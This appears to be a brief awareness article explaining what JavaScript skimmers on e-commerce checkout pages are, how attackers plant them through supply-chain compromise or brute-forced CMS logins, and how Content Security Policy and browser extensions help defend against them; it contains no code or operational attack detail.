What is a JavaScript Skimmer?
A JavaScript skimmer is an injected piece of malicious code that infiltrates the POS (point of sale) for online and e-commerce websites. These skimmers can be carried out and disseminated through various means by attackers but the ultimate objective is to attain sensitive credit card and personal data that attackers can then resell on the dark web. By infiltrating an online checkout or cart, customers will continue to submit their payment information unaware that their data is being sent back directly to the attacker that initially injected the malware. Thus the e-commerce industry must keep up with the various types and methods of javascript skimmers that threaten hundreds of thousands of companies and businesses.
How Do JavaScript Skimmers Work?
The evolution of skimming grew from a physical device inserted as POS (point of sale) hardware, such as an ATM, and has transformed into the online world where a physical device is no longer needed to extract the most sensitive and personal data out there. Currently, the e-commerce industry faces several online groups that disseminate JavaScript malware to exfiltrate customers credit card information and personal data. These skimmers place a code which will then scan all the private information that customers provide at the time of purchase or checkout. The difficulty is how sophisticated these lines of malicious code can be as they can also go undetected to analysts.
- Supply Chain Attack: This method of infiltration occurs when attackers compromise a vulnerability from a third party vendor. Once the attackers gain access through these vendors they are then able to inject their malicious code that would disseminate among the original code giving control and access to the attackers.
- Direct Hack of Website: Attackers can also infiltrate a website’s code by acquiring credentials from administrators through a brute-force attack. This type of an attack most commonly occurs with CMS (Content Management System) platforms.
How to Protect Against JavaScript Skimmers?
While javaScript skimmer attacks are increasing and continuing to plague the e-commerce industry, there are certain measures that companies can implement to protect their servers and data.
- Implementing Content Security Policy (CSP): With content security policies, businesses are able to restrict the transfer of communication and data between unknown and untrusted domains. With this form of a restriction, attackers hoping to inject malicious code will be blocked and won’t be able to complete their attacks.
Client-Side Extensions: Special extensions can allow for visitors, (client-side) to be able to monitor and have more control over their browsing experience. This can ensure a safe browser that can protect visitors and ultimately prevent any malicious code from interfering as users engage with online stores. Users can even take their precaution another step further by using browsers that don’t allow third parties to engage on webpages. This may be an extreme precaution but users can avoid any potential threats as this eliminates a common route of attacks for many javascript skimmers.